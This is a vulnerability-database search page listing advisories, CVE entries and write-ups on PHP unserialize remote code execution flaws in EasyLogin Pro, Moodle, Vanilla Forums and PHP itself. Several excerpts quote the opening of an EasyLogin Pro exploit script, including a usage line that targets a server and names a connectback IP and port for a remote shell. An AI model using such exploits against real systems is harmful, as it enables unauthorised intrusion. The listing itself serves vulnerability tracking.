Lucene search

1305 matches found

AlpineLinux
added 2018/11/20 9:0 p.m. | 46 views

CVE-2018-19396

ext/standard/var_unserializer.c in PHP 5.x through 7.1.24 allows attackers to cause a denial of service (application crash) via an unserialize call for the com, dotnet, or variant class...

CVSS 7.5 | AI score 7.5 | EPSS 0.04584
Exploits: 1

CVE
added 2018/11/20 9:0 p.m. | 1046 views

CVE-2018-19396

CVE-2018-19396 affects PHP 5.x through 7.1.24. The issue lies in ext/standard/var_unserializer.c where an unserialize call for the com, dotnet, or variant class can cause a denial of service (application crash). Several connected advisories (EulerOS/OpenVAS/NVD entries) document this vulnerabilit...

CVSS 7.5 | AI score 7.3 | EPSS 0.04584
Exploits: 1 | References: 3 | Affected Software: 1

Debian CVE
added 2018/11/20 9:0 p.m. | 33 views

CVE-2018-19396

Removed by vendor...

CVSS 7.5 | AI score 7.8 | EPSS 0.04584
Exploits: 1

Hacker One
added 2018/09/27 9:27 a.m. | 33 views

h1-5411-CTF: Solution for h15411's CTF challenge

Baby steps Earlier today a friend tipped me off about an ongoing CTF challenge that was being run by HackerOne and would get the first ten winners a ticket to participate in h15411, which will be a live-hacking event happening in Buenos Aires. This immediately caught my attention and I decided to...

AI score 8.1
Exploits: 0

Hacker One
added 2018/09/27 12:5 a.m. | 30 views

h1-5411-CTF: H1-5411 CTF Write-up by erbbysam and ziot

@erbbysam and I recently set out to beat the latest CTF challenge hosted by HackerOne. Here is a write-up with the process we took from start to finish. The h1-5411 CTF begins with a tweet from HackerOne: https://twitter.com/Hacker0x01/status/1044974142150373378 F351665 This leads to a website...

AI score 8.3
Exploits: 0

Packet Storm
added 2018/09/19 12:0 a.m. | 1644 views

Moodle 3.x PHP Unserialize Remote Code Execution

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Remote Code Execution via PHP unserialize product: Moodle - Open-source learning platform vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier...

AI score 0.5 | EPSS 0.04425
Exploits: 3

Hacker One
added 2018/09/15 10:22 p.m. | 47 views

Vanilla: Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability

Summary: An authenticated admin user can inject an unserializable password in another user's account. Later when attempting a login with that user, the attacker can trigger a call to an unserialize in the splitHash function. By using a custom pop chain to write into the constants.php file, an...

Exploits: 0

Hacker One
added 2018/09/08 9:56 p.m. | 13 views

Vanilla: Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability

Summary: An authenticated admin user can trigger a call to unserialize which can allow an attacker to gain remote code execution. Description: Please bear with me on this one, it's heavy. Ok, so after setting a Garden.TouchIcon setting it can be several settings, this is just an example of one we...

AI score 8
Exploits: 0

RedHat Linux
added 2018/09/04 6:25 a.m. | 8 views

glusterfs: Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory

A flaw was found in the dict.c:dict_unserialize function of glusterfs: the dict_unserialize function does not handle negative key length values. An attacker could use this flaw to read memory from other locations into the stored dict value...

CVSS 7.5 | AI score 7.3 | EPSS 0.03071
Exploits: 0 | References: 4

RedHat Linux
added 2018/09/04 6:24 a.m. | 1 views

glusterfs: Improper deserialization in dict.c:dict_unserialize() can allow attackers to read arbitrary memory

A flaw was found in the dict.c:dict_unserialize function of glusterfs: the dict_unserialize function does not handle negative key length values. An attacker could use this flaw to read memory from other locations into the stored dict value...

CVSS 7.5 | AI score 7.3 | EPSS 0.03071
Exploits: 0 | References: 4

OSV
added 2018/08/24 9:29 p.m. | 3 views

CVE-2018-15576

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

CVSS 8.1 | AI score 6.3 | EPSS 0.09675
Exploits: 5 | References: 2

Prion
added 2018/08/24 9:29 p.m. | 14 views

Remote code execution

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

CVSS 6.8 | AI score 8.4 | EPSS 0.09675
Exploits: 5 | References: 2 | Affected Software: 1

CVE
added 2018/08/24 9:0 p.m. | 51 views

CVE-2018-15576

CVE-2018-15576 affects EasyLogin Pro up to version 1.3.0. The vulnerability is in Encryptor.php, where an unserialize call in the decrypt function can lead to remote code execution if an attacker knows the key. Documents indicate public exploitation evidence (Exploit-DB, etc.), confirming a RCE r...

CVSS 8.1 | AI score 8.3 | EPSS 0.09675
Exploits: 5 | References: 2 | Affected Software: 1

Cvelist
added 2018/08/24 9:0 p.m. | 15 views

CVE-2018-15576

An issue was discovered in EasyLogin Pro through 1.3.0. Encryptor.php contains an unserialize call that can be exploited for remote code execution in the decrypt function, if the attacker knows the key...

AI score 8.4 | EPSS 0.09675
Exploits: 5 | References: 2

Packet Storm
added 2018/08/21 12:0 a.m. | 62 views

Easylogin Pro 1.3.0 Remote Code Execution

#!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

AI score 0.5 | EPSS 0.09675
Exploits: 5

0day.today
added 2018/08/20 12:0 a.m. | 58 views

Easylogin Pro 1.3.0 - Unserialize Remote Code Execution Exploit

Exploit for php platform in category remote exploits #!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t...

AI score 0.5 | EPSS 0.09675
Exploits: 5

Exploit DB
added 2018/08/20 12:0 a.m. | 45 views

Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution

#!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

CVSS 8.1 | AI score 8.2 | EPSS 0.09675
Exploits: 5

The Hacker News
added 2018/08/17 9:26 a.m. | 124 views

New PHP Code Execution Attack Puts WordPress Sites at Risk

Sam Thomas, a security researcher from Secarma, has discovered a new exploitation technique that could make it easier for hackers to trigger critical deserialization vulnerabilities in the PHP programming language using functions previously considered low-risk. The new technique leaves hundreds of...

AI score 0.7
Exploits: 0

Source Incite
added 2018/08/17 12:0 a.m. | 22 views

SRC-2018-0030 : Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability

Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Vanilla Forums. Authentication is not required to exploit this vulnerability. The specific flaw exists within the domGetImages function of the ImportController class. The iss...

CVSS 9.8 | AI score 9.7 | EPSS 0.05152
Exploits: 2

Source Incite
added 2018/08/15 12:0 a.m. | 18 views

SRC-2018-0033 : Vanilla Forums XenforoPassword splitHash unserialize Remote Code Execution Vulnerability

Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Vanilla Forums. Authentication is required to exploit this vulnerability, however the authentication can be bypassed. The specific flaw exists within the splitHash function o...

AI score 8.1
Exploits: 0